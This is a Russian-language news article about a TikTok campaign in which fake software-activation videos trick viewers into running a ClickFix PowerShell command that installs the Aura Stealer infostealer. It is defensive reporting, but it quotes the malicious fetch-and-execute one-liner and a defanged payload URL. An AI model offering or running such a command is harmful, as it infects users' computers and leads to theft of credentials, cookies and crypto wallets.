TechBriefly RU
  • Tech
  • Business
  • How to
  • about
    • Sur Tech Briefly
    • Modalités et Conditions
    • Politique de Confidentialité
    • Contact Us
No Result
View All Result
TechBriefly RU
No Result
View All Result
Home Tech

Видео TikTok распространяют Aura Stealer через поддельные руководства по программному обеспечению

byAytun Çelebi
21/10/2025
in Tech
Reading Time: 1 min read
Видео TikTok распространяют Aura Stealer через поддельные руководства по программному обеспечению
Share on FacebookShare on Twitter

Киберпреступники распространяют вредоносное ПО, кражущее информацию, посредством кампании в TikTok, используя видеоролики, которые ложно выдают себя за бесплатные руководства по активации популярного программного обеспечения. Продолжающаяся операция, обнаруженная 19 октября 2025 года, использует метод социальной инженерии, чтобы обманом заставить пользователей заразить их собственные компьютеры. Обработчик ISC Ксавьер Мертенс сообщил о кампании, отметив ее сходство с операцией, которую Trend Micro наблюдала в мае. Видео TikTok содержат инструкции по активации законного программного обеспечения, такого как Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro и Discord Nitro. Кампания также продвигает сфабрикованные услуги, в том числе «Netflix Premium» и «Spotify Premium», чтобы привлечь более широкую аудиторию. Техника атаки известна как атака ClickFix, которая включает в себя предоставление, казалось бы, полезных инструкций, которые обманом заставляют пользователей выполнять вредоносные команды. В видеороликах отображается короткая однострочная команда PowerShell, и зрителям предлагается выполнить ее с правами администратора. Показанный пример команды: iex (irm slmgr[.]win/photoshop). Имя конкретной программы в URL-адресе, например «фотошоп», изменяется в соответствии с программным обеспечением, олицетворяемым в видео. Когда пользователь выполняет эту команду, PowerShell подключается к удаленному сайту. slmgr[.]win. Это действие извлекает и запускает второй сценарий PowerShell, который затем загружает два исполняемых файла со страниц Cloudflare. Первый файл, скачанный с https://file-epq[.]pages[.]dev/updater.exeпредставляет собой вариант вредоносной программы Aura Stealer. Aura Stealer предназначен для сбора сохраненных учетных данных из веб-браузеров, файлов cookie аутентификации, криптовалютных кошельков и данных входа из других приложений. Эта украденная информация затем загружается злоумышленникам, предоставляя им доступ к учетным записям жертвы. Вторая полезная нагрузка, названная source.exeтакже загружается. Этот исполняемый файл используется для самокомпиляции кода с помощью встроенного компилятора Visual C# платформы .NET (csc.exe). Скомпилированный код впоследствии внедряется и запускается непосредственно в памяти. Конкретное назначение этой второй полезной нагрузки еще не определено. Пользователям, которые следовали инструкциям в этих видеороликах, следует считать, что все их учетные данные скомпрометированы, и им рекомендуется немедленно сбросить пароли для всех веб-сайтов и онлайн-сервисов, которые они используют. За последний год атаки ClickFix стали значительно более распространенными. Они используются для распространения различных штаммов вредоносного ПО в кампаниях, связанных с программами-вымогателями и кражей криптовалюты. В соответствии с общей практикой безопасности пользователи никогда не должны копировать текст с веб-сайта и выполнять его в диалоговом окне операционной системы, включая адресную строку Проводника, командную строку, PowerShell, терминал macOS или оболочки Linux.

  Instafest для Apple Music: Генератор составов фестивалей

Source: Видео TikTok распространяют Aura Stealer через поддельные руководства по программному обеспечению

Related Posts

OpenAI исследует приоритетную рекламу для ответов ChatGPT

OpenAI исследует приоритетную рекламу для ответов ChatGPT

К выставке CES 2026 компания Samsung представила более яркий проектор Freestyle+

К выставке CES 2026 компания Samsung представила более яркий проектор Freestyle+

Новый Punkt MC03 оснащен разделенной ОС для лучшего контроля конфиденциальности

Новый Punkt MC03 оснащен разделенной ОС для лучшего контроля конфиденциальности

Apple обещает нечто грандиозное для Fitness+ в 2026 году

Apple обещает нечто грандиозное для Fitness+ в 2026 году

OpenAI исследует приоритетную рекламу для ответов ChatGPT
Tech

OpenAI исследует приоритетную рекламу для ответов ChatGPT

К выставке CES 2026 компания Samsung представила более яркий проектор Freestyle+
Tech

К выставке CES 2026 компания Samsung представила более яркий проектор Freestyle+

Новый Punkt MC03 оснащен разделенной ОС для лучшего контроля конфиденциальности
Tech

Новый Punkt MC03 оснащен разделенной ОС для лучшего контроля конфиденциальности

Apple обещает нечто грандиозное для Fitness+ в 2026 году
Tech

Apple обещает нечто грандиозное для Fitness+ в 2026 году

В 2025 году Honor продаст более 71 миллиона смартфонов
Tech

В 2025 году Honor продаст более 71 миллиона смартфонов

TechBriefly RU

© 2021 TechBriefly is a Linkmedya brand.

  • About
  • Blog
  • Contact
  • Contact Us
  • Cover Page
  • Modalités et Conditions
  • Politique de Confidentialité
  • Sur Tech Briefly
  • TechBriefly

Follow Us

No Result
View All Result
  • Tech
  • Business
  • How to
  • about
    • Sur Tech Briefly
    • Modalités et Conditions
    • Politique de Confidentialité
    • Contact Us

This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.